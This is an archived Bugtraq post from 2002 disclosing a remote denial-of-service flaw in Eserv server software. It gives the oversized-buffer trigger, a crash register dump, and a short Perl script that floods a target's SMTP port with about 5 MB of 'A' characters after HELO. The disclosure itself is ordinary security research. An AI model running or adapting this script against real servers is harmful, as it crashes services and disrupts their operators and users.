[28189] in bugtraq
Eserv remote denial of service
daemon@ATHENA.MIT.EDU (securma massine)
Fri Dec 13 11:52:06 2002
From: securma massine <securma@caramail.com>
To: bugtraq@securityfocus.com
Message-ID: <1039779786020085@caramail.com>
Mime-Version: 1.0
Date: Fri, 13 Dec 2002 12:43:06 GMT+1
Content-Type: multipart/mixed; boundary="=_NextPart_Caramail_0200851039779786_ID"
--=_NextPart_Caramail_0200851039779786_ID
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
hi
Eserv is Mail, News, Web, FTP and Proxy Servers for
Win95/98/NT/2000 (http://www.eserv.ru/)
Eserv is vulnerable has an attack back by sending a buffer
of 5M of Data with port 119 or 25 or 110 or 21 with a
buffer of 5080000 byte ,
version tested: v2.97, v2.99 (possible all version are
vulnerable)
one has the following error:
l insructio a "0x0000fde8" emploie l'adresse
memoire "0x0000fde8" la memoire e peut pas etre
"read"
the state of the registers is:
eax=3Dc0000000 ebx=3D004c3ed5 ecx=3D0000fde8 edx=3D002f0608
esi=3D004fc17e edi=3D003bb358
eip=3D0000fde8 esp=3D0189efa4 ebp=3D0189ff54 iopl=3D0 nv up
ei pl nz ac pe nc
cs=3D001b ss=3D0023 ds=3D0023 es=3D0023 fs=3D0038
gs=3D0000 efl=3D00000212
0000fde8 ?? ???
while adding a few bytes to the buffer the programe falls
without any message
exploit:
#!/usr/bin/perl -w
#greetz: marocit
#tool Eserv_dos.pl
use IO::Socket;
$buffer =3D "A"x 5080000 ;
$hel =3D "HELO "
$connect =3D IO::Socket::INET ->new (Proto=3D>"tcp",
PeerAddr=3D> "$ARGV[0]",
PeerPort=3D>"25"); unless ($connect) { die "cant connect $ARGV
[0]" }
print $connect "$hel$buffer";
print "\nsending exploit......\n\n";
securma massine
_________________________________________________________
Gagne une PS2 ! Envoie un SMS avec le code PS au 61166
(0,35€ Hors co=FBt du SMS)
--=_NextPart_Caramail_0200851039779786_ID--
